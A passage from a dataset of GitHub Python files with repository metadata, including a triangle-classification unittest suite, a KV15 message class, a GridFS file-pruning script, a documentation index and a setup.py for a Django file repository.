\"MIT\"\n]"},"license_type":{"kind":"string","value":"permissive"},"repo_name":{"kind":"string","value":"rflynn/radixtree"},"repo_url":{"kind":"string","value":"https://github.com/rflynn/radixtree"},"snapshot_id":{"kind":"string","value":"f61a4c74a7c7ba9704e5d539361b177b18d12273"},"revision_id":{"kind":"string","value":"398b71157e83e994c59fa88bcabfd8ebcac52017"},"branch_name":{"kind":"string","value":"refs/heads/master"},"visit_date":{"kind":"timestamp","value":"2016-09-05T19:28:17.076752","string":"2016-09-05T19:28:17.076752"},"revision_date":{"kind":"timestamp","value":"2014-03-08T22:32:18","string":"2014-03-08T22:32:18"},"committer_date":{"kind":"timestamp","value":"2014-03-08T22:32:18","string":"2014-03-08T22:32:18"},"github_id":{"kind":"number","value":3547109,"string":"3,547,109"},"star_events_count":{"kind":"number","value":1,"string":"1"},"fork_events_count":{"kind":"number","value":0,"string":"0"},"gha_license_id":{"kind":"null"},"gha_fork":{"kind":"null"},"gha_event_created_at":{"kind":"null"},"gha_created_at":{"kind":"null"},"gha_updated_at":{"kind":"null"},"gha_pushed_at":{"kind":"null"},"gha_size":{"kind":"null"},"gha_stargazers_count":{"kind":"null"},"gha_forks_count":{"kind":"null"},"gha_open_issues_count":{
"kind":"null"},"gha_language":{"kind":"null"},"gha_archived":{"kind":"null"},"gha_disabled":{"kind":"null"},"content":{"kind":"string","value":"# ex: set ts=4 et:\n\nfrom radixtree import RadixTree, URLTree\n\nRadixTree.test()\nURLTree.test()\n\n"},"src_encoding":{"kind":"string","value":"UTF-8"},"language":{"kind":"string","value":"Python"},"is_vendor":{"kind":"bool","value":false,"string":"false"},"is_generated":{"kind":"bool","value":false,"string":"false"},"year":{"kind":"number","value":2014,"string":"2,014"}}},{"rowIdx":1195,"cells":{"__id__":{"kind":"number","value":13099650268405,"string":"13,099,650,268,405"},"blob_id":{"kind":"string","value":"bc115d46c27758e706498234519b250073c8c303"},"directory_id":{"kind":"string","value":"65ac1849fad78cc8effe46bf3aa6df0a8fb39058"},"path":{"kind":"string","value":"/triangle/test.py"},"content_id":{"kind":"string","value":"22dbd69a2be2264f9290439b7232db26c3e29638"},"detected_licenses":{"kind":"list like","value":[],"string":"[]"},"license_type":{"kind":"string","value":"no_license"},"repo_name":{"kind":"string","value":"thylm55/ktpm2013"},"repo_url":{"kind":"string","value":"https://github.com/thylm55/ktpm2013"},"snapshot_id":{"kind":"string","value":"97d827ffcadc1acb770dba4e14caf5e5e76785ce"},"revision_id":{"kind":"string","value":"f7ea72368c4e8c2bd30681dff71766987ee75d1c"},"branch_name":{"kind":"string","value":"refs/heads/master"},"visit_date":{"kind":"timestamp","value":"2016-09-06T11:04:47.768403","string":"2016-09-06T11:04:47.768403"},"revision_date":{"kind":"timestamp","value":"2013-10-19T17:30:06","string":"2013-10-19T17:30:06"},"committer_date":{"kind":"timestamp","value":"2013-10-19T17:30:06","string":"2013-10-19T17:30:06"},"github_id":{"kind":"null"},"star_events_count":{"kind":"number","value":0,"string":"0"},"fork_events_count":{"kind":"number","value":0,"string":"0"},"gha_license_id":{"kind":"null"},"gha_fork":{"kind":"null"},"gha_event_created_at":{"kind":"null"},"gha_created_at":{"kind":"null"},"gha_updat
ed_at":{"kind":"null"},"gha_pushed_at":{"kind":"null"},"gha_size":{"kind":"null"},"gha_stargazers_count":{"kind":"null"},"gha_forks_count":{"kind":"null"},"gha_open_issues_count":{"kind":"null"},"gha_language":{"kind":"null"},"gha_archived":{"kind":"null"},"gha_disabled":{"kind":"null"},"content":{"kind":"string","value":"OUTPUT01 = 'equilateral triangle'\nOUTPUT02 = 'isosceles right triangle'\nOUTPUT03 = 'right triangle'\nOUTPUT04 = 'isosceles triangle'\nOUTPUT05 = 'triangle'\nOUTPUT06 = 'not identified'\n\nimport unittest\nimport math\n\nfrom triangle import detect_triangle\n\nclass TriangleTest(unittest.TestCase):\n # classification test cases\n\n # equilateral triangle\n def test01a(self):\n result = detect_triangle(3, 3, 3)\n self.assertEqual(result, OUTPUT01)\n \n def test01b(self):\n result = detect_triangle(2**32-1, 2**32-1, 2**32-1)\n self.assertEqual(result, OUTPUT01)\n\n def test01c(self):\n result = detect_triangle(1e-30, 1e-30, 1e-30)\n self.assertEqual(result, OUTPUT01)\n\n # isosceles right triangle\n def test02a(self):\n result = detect_triangle(2, 2, math.sqrt(8))\n self.assertEqual(result, OUTPUT02)\n \n def test02b(self):\n result = detect_triangle(3, 3, math.sqrt(18))\n self.assertEqual(result, OUTPUT02)\n\n def test02c(self):\n result = detect_triangle(4, 4, math.sqrt(32))\n self.assertEqual(result, OUTPUT02)\n\n def test02d(self):\n result = detect_triangle(7, 7, math.sqrt(98))\n self.assertEqual(result, OUTPUT02)\n\n # right triangle\n def test03a(self):\n result = detect_triangle(3, 4, 5)\n self.assertEqual(result, OUTPUT03)\n\n def test03b(self):\n result = detect_triangle(6, 5, math.sqrt(61))\n self.assertEqual(result, OUTPUT03)\n\n # isosceles triangle\n def test04a(self):\n result = detect_triangle(7, 7, 5)\n self.assertEqual(result, OUTPUT04)\n\n def test04b(self):\n result = detect_triangle(2**32-1, 2**32-1, 4)\n self.assertEqual(result, OUTPUT04)\n\n def test04c(self):\n result = detect_triangle(2**32-1, 2**32-1, 2**32-2)\n 
self.assertEqual(result, OUTPUT04)\n\n def test04d(self):\n result = detect_triangle(2**32-1, 4, 2**32-1)\n self.assertEqual(result, OUTPUT04)\n\n def test04d(self):\n result = detect_triangle(2**32-1, 4, 2**32-1)\n self.assertEqual(result, OUTPUT04)\n\n # triangle\n def test05a(self):\n result = detect_triangle(2, 3, 4)\n self.assertEqual(result, OUTPUT05)\n\n def test05b(self):\n result = detect_triangle(2**32-1, 2**32-2, 2**32-3)\n self.assertEqual(result, OUTPUT05)\n\n def test05c(self):\n result = detect_triangle(2**32-1, 2**32-2, 3)\n self.assertEqual(result, OUTPUT05) \n\n def test06a(self):\n result = detect_triangle(1, 2, 3)\n self.assertEqual(result, OUTPUT06)\n\n # input test cases\n def test07a(self):\n result = detect_triangle(-2, 3, 4)\n self.assertEqual(result, OUTPUT06)\n\n def test07b(self):\n result = detect_triangle(2, -3, 4)\n self.assertEqual(result, OUTPUT06)\n\n def test07c(self):\n result = detect_triangle(2, 3, -4)\n self.assertEqual(result, OUTPUT06)\n\n def test08a(self):\n result = detect_triangle(\"a\", 3, 4)\n self.assertEqual(result, OUTPUT06)\n\n def test08b(self):\n result = detect_triangle(2, \"math.sqrt(2)\", 4)\n self.assertEqual(result, OUTPUT06)\n\n def test08c(self):\n result = detect_triangle(2, 3, \"2**32-1\")\n self.assertEqual(result, OUTPUT06)\n\n def test09a(self):\n result = detect_triangle()\n self.assertEqual(result, OUTPUT06)\n\n def test09b(self):\n result = detect_triangle(2)\n self.assertEqual(result, OUTPUT06)\n\n def test09c(self):\n result = detect_triangle(2, 3)\n self.assertEqual(result, OUTPUT06)\n\n def test10a(self):\n result = detect_triangle(0, 0, 0)\n self.assertEqual(result, OUTPUT06)\n\n def test10b(self):\n result = detect_triangle(0, 3, 4)\n self.assertEqual(result, OUTPUT06)\n\n def test10c(self):\n result = detect_triangle(2, 0, 4)\n self.assertEqual(result, OUTPUT06)\n\n def test10d(self):\n result = detect_triangle(2, 3, 0)\n self.assertEqual(result, OUTPUT06)\n\n# run test\nif __name__ == 
'__main__':\n unittest.main()\n"},"src_encoding":{"kind":"string","value":"UTF-8"},"language":{"kind":"string","value":"Python"},"is_vendor":{"kind":"bool","value":false,"string":"false"},"is_generated":{"kind":"bool","value":false,"string":"false"},"year":{"kind":"number","value":2013,"string":"2,013"}}},{"rowIdx":1196,"cells":{"__id__":{"kind":"number","value":19670950233002,"string":"19,670,950,233,002"},"blob_id":{"kind":"string","value":"0ce4b762cba8c0ef8a7780daa575967c655eb588"},"directory_id":{"kind":"string","value":"119efda3f0af227958aa9b14e7ea1687453cdf10"},"path":{"kind":"string","value":"/kv15/kv15messages.py"},"content_id":{"kind":"string","value":"04f2c35e035bc97d234b91858f87473f4131d53b"},"detected_licenses":{"kind":"list like","value":[],"string":"[]"},"license_type":{"kind":"string","value":"no_license"},"repo_name":{"kind":"string","value":"sven4all/openebs"},"repo_url":{"kind":"string","value":"https://github.com/sven4all/openebs"},"snapshot_id":{"kind":"string","value":"9c48fec296973df6f70ccd94259d09c629c69558"},"revision_id":{"kind":"string","value":"f0abbda96b83cb71f323aceaec777a95c01d09f8"},"branch_name":{"kind":"string","value":"refs/heads/master"},"visit_date":{"kind":"timestamp","value":"2021-01-17T21:47:54.863980","string":"2021-01-17T21:47:54.863980"},"revision_date":{"kind":"timestamp","value":"2012-12-10T01:16:41","string":"2012-12-10T01:16:41"},"committer_date":{"kind":"timestamp","value":"2012-12-10T01:16:41","string":"2012-12-10T01:16:41"},"github_id":{"kind":"null"},"star_events_count":{"kind":"number","value":0,"string":"0"},"fork_events_count":{"kind":"number","value":0,"string":"0"},"gha_license_id":{"kind":"null"},"gha_fork":{"kind":"null"},"gha_event_created_at":{"kind":"null"},"gha_created_at":{"kind":"null"},"gha_updated_at":{"kind":"null"},"gha_pushed_at":{"kind":"null"},"gha_size":{"kind":"null"},"gha_stargazers_count":{"kind":"null"},"gha_forks_count":{"kind":"null"},"gha_open_issues_count":{"kind":"null"},"gha_language":{
"kind":"null"},"gha_archived":{"kind":"null"},"gha_disabled":{"kind":"null"},"content":{"kind":"string","value":"from io.push import Push\n\nclass KV15messages:\n\tdef __init__(self, stopmessages = None):\n\t\tif stopmessages is None:\n\t\t\tself.stopmessages = []\n\t\telse:\n\t\t\tself.stopmessages = stopmessages\n\t\n\tdef __str__(self):\n\t\txml = \"\"\"\t\\n\"\"\"\n\t\tfor stopmessage in self.stopmessages:\n\t\t\txml += str(stopmessage)\n\t\txml += \"\"\"\t\"\"\"\n\n\t\treturn xml\n\t\n\tdef push(self, remote, path):\n\t\treturn Push(dossiername='KV15messages', content = str(self), namespace='http://bison.connekt.nl/tmi8/kv15/msg').push(remote, path)\n\n"},"src_encoding":{"kind":"string","value":"UTF-8"},"language":{"kind":"string","value":"Python"},"is_vendor":{"kind":"bool","value":false,"string":"false"},"is_generated":{"kind":"bool","value":false,"string":"false"},"year":{"kind":"number","value":2012,"string":"2,012"}}},{"rowIdx":1197,"cells":{"__id__":{"kind":"number","value":15453292358713,"string":"15,453,292,358,713"},"blob_id":{"kind":"string","value":"fe0087481c31804abcdacecfb9846e35607f1760"},"directory_id":{"kind":"string","value":"3967090c44cba1a77dd573ac1b16566ccbdfc5d7"},"path":{"kind":"string","value":"/utilities/prunefiles.py"},"content_id":{"kind":"string","value":"09cdd6ac92c66e41827f2c946bbfd73fac6c4dcc"},"detected_licenses":{"kind":"list 
like","value":[],"string":"[]"},"license_type":{"kind":"string","value":"no_license"},"repo_name":{"kind":"string","value":"cgperschon/slickqa"},"repo_url":{"kind":"string","value":"https://github.com/cgperschon/slickqa"},"snapshot_id":{"kind":"string","value":"c0e79656b4352140b4ef6a31bc32415a4352b94f"},"revision_id":{"kind":"string","value":"6eae7361da4a95ab22377edf9d1349295d248982"},"branch_name":{"kind":"string","value":"refs/heads/master"},"visit_date":{"kind":"timestamp","value":"2021-01-01T17:15:56.475399","string":"2021-01-01T17:15:56.475399"},"revision_date":{"kind":"timestamp","value":"2014-02-05T19:49:34","string":"2014-02-05T19:49:34"},"committer_date":{"kind":"timestamp","value":"2014-02-05T19:49:34","string":"2014-02-05T19:49:34"},"github_id":{"kind":"number","value":35633779,"string":"35,633,779"},"star_events_count":{"kind":"number","value":0,"string":"0"},"fork_events_count":{"kind":"number","value":0,"string":"0"},"gha_license_id":{"kind":"null"},"gha_fork":{"kind":"null"},"gha_event_created_at":{"kind":"null"},"gha_created_at":{"kind":"null"},"gha_updated_at":{"kind":"null"},"gha_pushed_at":{"kind":"null"},"gha_size":{"kind":"null"},"gha_stargazers_count":{"kind":"null"},"gha_forks_count":{"kind":"null"},"gha_open_issues_count":{"kind":"null"},"gha_language":{"kind":"null"},"gha_archived":{"kind":"null"},"gha_disabled":{"kind":"null"},"content":{"kind":"string","value":"#!/usr/bin/env python\n__author__ = 'jcorbett'\n\nimport argparse\nimport pymongo\nimport sys\n\nfrom gridfs import GridFS\n\ndef main(arguments):\n parser = argparse.ArgumentParser(description='Remove files from a set of results.')\n parser.add_argument(\"-p\", \"--project\", dest=\"project\", required=True, help=\"The project to prune files from\")\n parser.add_argument(\"-r\", \"--release\", dest=\"release\", required=True, help=\"The release of the project to prune files from.\")\n options = parser.parse_args(args=arguments)\n\n connection = pymongo.Connection()\n db = 
connection['slickij']\n gridfs = GridFS(db)\n project = db.projects.find_one({'name': options.project})\n if project is None:\n print \"There is no project with the name\", options.project\n sys.exit(1)\n release = None\n for possible in project['releases']:\n if possible['name'] == options.release:\n release = possible\n break\n else:\n print \"There is no release with the name\", options.release\n sys.exit(1)\n\n number_of_results = db.results.find({'release.releaseId': release['id']}).count()\n print \"There are\", number_of_results, \"results in that release.\"\n resultnum = 0\n for result in db.results.find({'release.releaseId': release['id']}):\n sys.stdout.write(\"{:.2f}%\\r\".format(((float(resultnum) / number_of_results) * 100)))\n sys.stdout.flush()\n resultnum += 1\n if 'files' in result:\n for fileref in result['files']:\n fileobj = db[fileref.collection].find_one(fileref.id)\n gridfs.delete(fileref.id)\n print \"Done Removing files from\", number_of_results, \"results.\"\n print \"Removing file references from the results.\"\n db.results.update({'release.releaseId': release['id']}, {\"$unset\": {\"\": 1}}, False, True)\n print \"Done.\"\n\n\nif __name__ == '__main__':\n main(sys.argv[1:])\n\n"},"src_encoding":{"kind":"string","value":"UTF-8"},"language":{"kind":"string","value":"Python"},"is_vendor":{"kind":"bool","value":false,"string":"false"},"is_generated":{"kind":"bool","value":false,"string":"false"},"year":{"kind":"number","value":2014,"string":"2,014"}}},{"rowIdx":1198,"cells":{"__id__":{"kind":"number","value":2508260911506,"string":"2,508,260,911,506"},"blob_id":{"kind":"string","value":"287eb9f81d624c2e7ffeda1e3c23fb9211060a00"},"directory_id":{"kind":"string","value":"2c3340c0c9c3effc22ce181506a7c76718485510"},"path":{"kind":"string","value":"/src/toolkit/monitoring/hippo/index.py"},"content_id":{"kind":"string","value":"002cfc9a47531bec73892343581bda4ad88bdbbe"},"detected_licenses":{"kind":"list 
like","value":[],"string":"[]"},"license_type":{"kind":"string","value":"no_license"},"repo_name":{"kind":"string","value":"samtaufa/nomoa.bsd"},"repo_url":{"kind":"string","value":"https://github.com/samtaufa/nomoa.bsd"},"snapshot_id":{"kind":"string","value":"3db5b336c34c8e24f94601129ab4f9682adbbac3"},"revision_id":{"kind":"string","value":"592e158be1d8a078625c56bce973449c61fd6451"},"branch_name":{"kind":"string","value":"refs/heads/master"},"visit_date":{"kind":"timestamp","value":"2021-01-25T07:34:35.637146","string":"2021-01-25T07:34:35.637146"},"revision_date":{"kind":"timestamp","value":"2011-10-16T10:28:03","string":"2011-10-16T10:28:03"},"committer_date":{"kind":"timestamp","value":"2011-10-16T10:28:03","string":"2011-10-16T10:28:03"},"github_id":{"kind":"number","value":688565,"string":"688,565"},"star_events_count":{"kind":"number","value":0,"string":"0"},"fork_events_count":{"kind":"number","value":0,"string":"0"},"gha_license_id":{"kind":"null"},"gha_fork":{"kind":"null"},"gha_event_created_at":{"kind":"null"},"gha_created_at":{"kind":"null"},"gha_updated_at":{"kind":"null"},"gha_pushed_at":{"kind":"null"},"gha_size":{"kind":"null"},"gha_stargazers_count":{"kind":"null"},"gha_forks_count":{"kind":"null"},"gha_open_issues_count":{"kind":"null"},"gha_language":{"kind":"null"},"gha_archived":{"kind":"null"},"gha_disabled":{"kind":"null"},"content":{"kind":"string","value":"from countershape.doc import *\nimport countershape\n\nthis.layout = ns.tpl_layout\n\nthis.titlePrefix = ns.titlePrefix + \"[Configuration] \"\n\npages = [\n \n Page(\"install.md\",\n title=\"Install\",\n pageTitle=\"Simple Message 
System\"),\n]\n"},"src_encoding":{"kind":"string","value":"UTF-8"},"language":{"kind":"string","value":"Python"},"is_vendor":{"kind":"bool","value":false,"string":"false"},"is_generated":{"kind":"bool","value":false,"string":"false"},"year":{"kind":"number","value":2011,"string":"2,011"}}},{"rowIdx":1199,"cells":{"__id__":{"kind":"number","value":4939212441144,"string":"4,939,212,441,144"},"blob_id":{"kind":"string","value":"fcbccc63e45b83c0b89e304ffe25d23be6189e65"},"directory_id":{"kind":"string","value":"fefc919f8a7f348589fdccca864545656844d449"},"path":{"kind":"string","value":"/src/djangofr/repository/setup.py"},"content_id":{"kind":"string","value":"77eb652d3bc491932a764b9453a9f63de426bbfa"},"detected_licenses":{"kind":"list like","value":["GPL-3.0-only"],"string":"[\n \"GPL-3.0-only\"\n]"},"license_type":{"kind":"string","value":"non_permissive"},"repo_name":{"kind":"string","value":"akaak/django-file-repository"},"repo_url":{"kind":"string","value":"https://github.com/akaak/django-file-repository"},"snapshot_id":{"kind":"string","value":"c691a16370ef49a5b0d955b7d7a7c4d117366db1"},"revision_id":{"kind":"string","value":"44dabaf9483be1b8fa028f82679333f9437ac3f5"},"branch_name":{"kind":"string","value":"refs/heads/master"},"visit_date":{"kind":"timestamp","value":"2021-01-21T03:46:11.745046","string":"2021-01-21T03:46:11.745046"},"revision_date":{"kind":"timestamp","value":"2014-03-23T01:51:31","string":"2014-03-23T01:51:31"},"committer_date":{"kind":"timestamp","value":"2014-03-23T01:51:31","string":"2014-03-23T01:51:31"},"github_id":{"kind":"null"},"star_events_count":{"kind":"number","value":0,"string":"0"},"fork_events_count":{"kind":"number","value":0,"string":"0"},"gha_license_id":{"kind":"null"},"gha_fork":{"kind":"null"},"gha_event_created_at":{"kind":"null"},"gha_created_at":{"kind":"null"},"gha_updated_at":{"kind":"null"},"gha_pushed_at":{"kind":"null"},"gha_size":{"kind":"null"},"gha_stargazers_count":{"kind":"null"},"gha_forks_count":{"kind":"null"}
,"gha_open_issues_count":{"kind":"null"},"gha_language":{"kind":"null"},"gha_archived":{"kind":"null"},"gha_disabled":{"kind":"null"},"content":{"kind":"string","value":"import os\nfrom setuptools import setup\n\n# Utility function to read the README file.\n# Used for the long_description. It's nice, because now 1) we have a top level\n# README file and 2) it's easier to type in the README file than to put a raw\n# string in below ...\ndef read(fname):\n return open(os.path.join(os.path.dirname(__file__), fname)).read()\n\nsetup(\n name = \"django-file-repository\",\n version = \"0.2b\",\n author = \"Oscar Carballal Prego\",\n author_email = \"oscar.carballal@cidadania.coop\",\n description = (\"Simple file repository with public/private files, tags and categories.\"),\n license = \"GPLv3\",\n keywords = \"repository tagging categorization file\",\n url = \"http://github.com/cidadania/django-file-repository\",\n packages=['repository'],\n long_description=read('README'),\n classifiers=[\n \"Development Status :: 4 - Beta/Testing\",\n \"Topic :: Web Utilities\",\n \"Framework :: Django 1.4.5\",\n \"License :: OSI Approved :: GPLv3 License\",\n \"Operating System :: OS Independent\",\n \"Natural Language :: English\",\n \"Natural Language :: Spanish\",\n \"Dependencies :: django-registration, django-taggit\",\n \"Intended Audience :: Everyone\",\n 
],\n)\n"},"src_encoding":{"kind":"string","value":"UTF-8"},"language":{"kind":"string","value":"Python"},"is_vendor":{"kind":"bool","value":false,"string":"false"},"is_generated":{"kind":"bool","value":false,"string":"false"},"year":{"kind":"number","value":2014,"string":"2,014"}}}],"truncated":false,"partial":false},"paginationData":{"pageIndex":11,"numItemsPerPage":100,"numTotalItems":42509,"offset":1100,"length":100}},"jwt":"eyJhbGciOiJFZERTQSJ9.eyJyZWFkIjp0cnVlLCJwZXJtaXNzaW9ucyI6eyJyZXBvLmNvbnRlbnQucmVhZCI6dHJ1ZX0sImlhdCI6MTc1NjI2ODk1NCwic3ViIjoiL2RhdGFzZXRzL2xvdWJuYWJubC9vbGRfcHl0aG9uIiwiZXhwIjoxNzU2MjcyNTU0LCJpc3MiOiJodHRwczovL2h1Z2dpbmdmYWNlLmNvIn0.gGSKmzhIzBiVJB4BcsrpUgT9nUHDvXXwgkal0uWZonu0Q8uTghoqp5hpjmE_J5cAmqW2iIOIsE0NQC_FTuoZCg","displayUrls":true},"discussionsStats":{"closed":0,"open":1,"total":1},"fullWidth":true,"hasGatedAccess":true,"hasFullAccess":true,"isEmbedded":false,"savedQueries":{"community":[],"user":[]}}">
import Addition as Add
import Subtraction as Sub
import Multiplication as Mul
import Division as Div
if __name__ == "__main__":
    # Map each menu letter to the question class it instantiates.
    # (Fixes the original's shadowing of the builtin `type`, the
    # duplicated if/elif dispatch chains, and the double "Please write
    # a good letter !" message printed on invalid input.)
    OPERATIONS = {
        "a": Add.Addition,
        "s": Sub.Subtraction,
        "m": Mul.Multiplication,
        "d": Div.Division,
    }
    cont = True
    while cont:
        print("Welcome in this Learning software ! What do you want to do ?")
        choice = input("A for Addition, S for Subtraction, M for Multiplication and D for Division").lower()
        operation = OPERATIONS.get(choice)
        if operation is None:
            print("Please write a good letter !")
        else:
            # Each operation class takes a difficulty/size argument (3)
            # and prints itself as the question text.
            question = operation(3)
            print(question)
            answer = input("What's the answer ?")
            print(question.answer(int(answer)))
        stop = input("Would you like to stop or continue ? S to stop and C to continue").lower()
        # Any reply other than "s" continues the loop, as before.
        cont = stop != "s"
#!/usr/bin/env python
'''
tweetyourRSS is a simple python script that enables you to publish any RSS feed
on twitter
'''
import sys
import tweepy
import pickle
from bitly import Bitly
from twitter import Twitter
from feeds import Feeds
from settings import *
# Module metadata: authorship and licensing information for tweetyourRSS.
__author__ = "Alberto Buratti, Mattia Larentis"
__credits__ = ["Alberto Buratti", "Mattia Larentis", "Federico Scrinzi"]
__license__ = "WTFPL"
__maintainer__ = "Alberto Buratti"
__email__ = "[email protected]"
def main():
    '''
    App entry point.

    Loads the per-feed history of last-published timestamps, tweets every
    feed entry newer than that timestamp (with a bit.ly-shortened link and
    the feed's hashtag), then saves the updated history back to
    HISTORY_FILE.
    '''
    # gets a twitter object
    tw = Twitter(TWITTER['CONSUMER_KEY'], TWITTER['CONSUMER_SECRET'], \
        TWITTER['ACCESS_TOKEN'], TWITTER['ACCESS_TOKEN_SECRET'])

    # gets a bitly object
    bl = Bitly(BITLY['USER'], BITLY['APIKEY'])

    # tries to load the history from the file; starts from an empty
    # dictionary when the file is missing, truncated, or corrupted.
    # Bug fix: the original bare "except:" also swallowed unrelated
    # errors such as KeyboardInterrupt and SystemExit.
    try:
        with open(HISTORY_FILE, 'rb') as history_file:
            history = pickle.load(history_file)
    except (EnvironmentError, EOFError, pickle.UnpicklingError):
        history = dict()

    # cycles through the RSSs defined in settings
    for rsskey, rssvalue in RSS.iteritems():
        # gets a feed object
        fd = Feeds(rssvalue['RSS'])

        # uses the last stored timestamp for this feed, falling back to
        # the init value defined in settings on the first run
        # (bug fix: narrowed from a bare "except:" to KeyError, the only
        # exception a missing dict key can raise here).
        try:
            last_timestamp = history[rsskey]
        except KeyError:
            last_timestamp = (rssvalue['HISTORY'])['INIT_VALUE']
            history[rsskey] = last_timestamp

        # gets the updated feeds
        entries = fd.get_updated_feeds(rssvalue['HISTORY'], last_timestamp)

        # cycles through the feeds, tweeting them
        for feed in entries:
            link = bl.shorten_url(getattr(feed, rssvalue['LINK']))
            tweet = getattr(feed, rssvalue['TEXT'])
            # 10 characters of slack for the separators and any ellipsis
            # added by truncate() -- presumably; confirm against
            # Twitter.truncate's implementation.
            length = TWITTER['TWEET_LENGTH'] - len(rssvalue['HASHTAG']) \
                - len(link) - 10
            tweet = rssvalue['HASHTAG'] + ' ' + tw.truncate(tweet, length) \
                + ' ' + link
            tw.update_status(tweet, DEBUG)

        # updates the last timestamp
        history[rsskey] = fd.get_last_timestamp()

    # saves the history
    with open(HISTORY_FILE, 'wb') as history_file:
        pickle.dump(history, history_file)

    sys.exit(0)

if __name__ == "__main__":
    main()
"""
* Copyright 2007,2008,2009 John C. Gunther
* Copyright (C) 2009 Luke Kenneth Casson Leighton <[email protected]>
*
* Licensed under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at:
*
* http:#www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing,
* software distributed under the License is distributed on an
* "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,
* either express or implied. See the License for the specific
* language governing permissions and limitations under the
* License.
*
"""
import math
from pyjamas.ui import HasHorizontalAlignment
from pyjamas.ui import HasVerticalAlignment
# Validates multipliers used to simplify computing the
# upper left corner location of symbols and labels to
# properly reflect their alignment relative to the
# plotted point or labeled symbol.
def validateMultipliers(widthMultiplier, heightMultiplier):
    """Raise ValueError unless both multipliers are -1, 0, or 1.

    Bug fixes versus the original: it raised the undefined name
    ``IllegalArgumentException`` (which surfaced as a NameError), and
    it combined the two checks with ``and``, so arguments were only
    rejected when *both* were out of range -- contradicting the error
    message, which says both must individually be -1, 0, or 1.
    """
    if (not (widthMultiplier == 0 or abs(widthMultiplier) == 1) or
        not (heightMultiplier == 0 or abs(heightMultiplier) == 1)):
        raise ValueError(
            "widthMultiplier, heightMultiplier args must both be " +
            "either 0, 1, or -1")
# retrieves a location given its multipliers
def getAnnotationLocation(widthMultiplier, heightMultiplier):
    """Map a (widthMultiplier, heightMultiplier) pair onto the matching
    compass-point AnnotationLocation constant.

    Both multipliers are assumed to already be -1, 0, or 1; +1 shifts
    that range onto the 0..2 row/column indices of the lookup table.
    """
    compassRows = (
        (NORTHWEST, NORTH, NORTHEAST),
        (WEST, CENTER, EAST),
        (SOUTHWEST, SOUTH, SOUTHEAST),
    )
    # Height selects the row (top to bottom), width selects the column.
    return compassRows[heightMultiplier + 1][widthMultiplier + 1]
# Negative width or height "turn the symbol inside-out",
# requiring a corresponding "reflection" of annotation
# location (only needed for baseline-based bar symbols)
def transform(a, signWidth, signHeight):
    """Return *a*, reflected through the sign of each dimension.

    When both signs are non-negative the location is unchanged;
    otherwise the multipliers are flipped accordingly and the matching
    constant is looked up.
    """
    if signWidth >= 0 and signHeight >= 0:
        return a
    return getAnnotationLocation(signWidth * a.widthMultiplier,
                                 signHeight * a.heightMultiplier)
"""*
** Defines the location of a data point's annotation or hover
** annotation (which can be defined by either plain text, HTML,
** or a widget) relative to the location of that point's
** symbol. The "Field Summary"
** section below lists all available annotation locations.
** <p>
**
** The default annotation location is {@link
** AnnotationLocation#SOUTH SOUTH} for annotations and
** is symbol-type-dependent for hover annotations. See the
** <tt>setHoverLocation</tt> method for list of these defaults.
**
** <p>
**
** You can further adjust the position of a point's
** annotation (or hover annotation) by specifying non-zero
** positional shifts via the <tt>setAnnotationXShift</tt>
** and <tt>setAnnotationYShift</tt> (or via the
** <tt>setHoverXShift</tt>, <tt>setHoverYShift</tt>),
** and <tt>setHoverAnnotationSymbolType</tt> methods for
** hover annotations).
** <p>
**
** @see Curve.Point#setAnnotationLocation Point.setAnnotationLocation
** @see Curve.Point#setAnnotationXShift Point.setAnnotationXShift
** @see Curve.Point#setAnnotationYShift Point.setAnnotationYShift
** @see Symbol#setHoverLocation Symbol.setHoverLocation
** @see Symbol#setHoverAnnotationSymbolType
** Symbol.setHoverAnnotationSymbolType
** @see Symbol#setHoverXShift Symbol.setHoverXShift
** @see Symbol#setHoverYShift Symbol.setHoverYShift
** @see #DEFAULT_HOVER_LOCATION DEFAULT_HOVER_LOCATION
**
*"""
class AnnotationLocation:
    """Relative placement of an annotation with respect to its symbol.

    widthMultiplier and heightMultiplier (each -1, 0, or 1) scale the
    combined annotation and symbol sizes to derive the annotation's
    upper-left anchoring point; see getUpperLeftX/getUpperLeftY for the
    exact equations.
    """

    # these multiply the width and height of the annotation and
    # the symbol it is attached to in order to define the
    # center of the annotation (see equations in later code),
    # and thus the upper left corner anchoring point.
    def __init__(self, widthMultiplier, heightMultiplier):
        validateMultipliers(widthMultiplier, heightMultiplier)
        self.widthMultiplier = widthMultiplier
        self.heightMultiplier = heightMultiplier

    # These define the alignment of the label within its
    # containing 1 x 1 Grid. For example, if this
    # containing grid is to the left of the labeled
    # symbol (widthMultiplier==-1) the horizontal
    # alignment will be ALIGN_RIGHT, so as to bring the
    # contained label flush against the left edge of the
    # labeled symbol.
    def getHorizontalAlignment(self):
        """Return the HasHorizontalAlignment constant implied by
        widthMultiplier; raises ValueError on a corrupted multiplier."""
        if self.widthMultiplier == -1:
            result = HasHorizontalAlignment.ALIGN_RIGHT
        elif self.widthMultiplier == 0:
            result = HasHorizontalAlignment.ALIGN_CENTER
        elif self.widthMultiplier == 1:
            result = HasHorizontalAlignment.ALIGN_LEFT
        else:
            # Bug fix: the original raised IllegalStateException, an
            # undefined name in Python, which surfaced as a NameError.
            raise ValueError(
                "Invalid widthMultiplier: " + str(self.widthMultiplier) +
                " 1, 0, or -1 were expected.")
        return result

    def getUpperLeftX(self, x, w, symbolW):
        """Given the x-coordinate at the center of the symbol that this
        annotation annotates, the annotation's width, and the symbol's
        width, return the x-coordinate of the upper left corner of this
        annotation."""
        result = int (round(x +
                    (self.widthMultiplier * (w + symbolW) - w)/2.) )
        return result

    def getUpperLeftY(self, y, h, symbolH):
        """Analogous to getUpperLeftX, except for the y-coordinate."""
        result = int (round(y +
                    (self.heightMultiplier * (h + symbolH) - h)/2.))
        return result

    # analogous to getHorizontalAlignment
    def getVerticalAlignment(self):
        """Return the HasVerticalAlignment constant implied by
        heightMultiplier; raises ValueError on a corrupted multiplier."""
        if self.heightMultiplier == -1:
            result = HasVerticalAlignment.ALIGN_BOTTOM
        elif self.heightMultiplier == 0:
            result = HasVerticalAlignment.ALIGN_MIDDLE
        elif self.heightMultiplier == 1:
            result = HasVerticalAlignment.ALIGN_TOP
        else:
            # Bug fixes: the original raised the undefined name
            # IllegalStateException AND concatenated a str with an int,
            # so a TypeError fired before the intended message could
            # ever be built.
            raise ValueError(
                "Invalid heightMultiplier: " + str(self.heightMultiplier) +
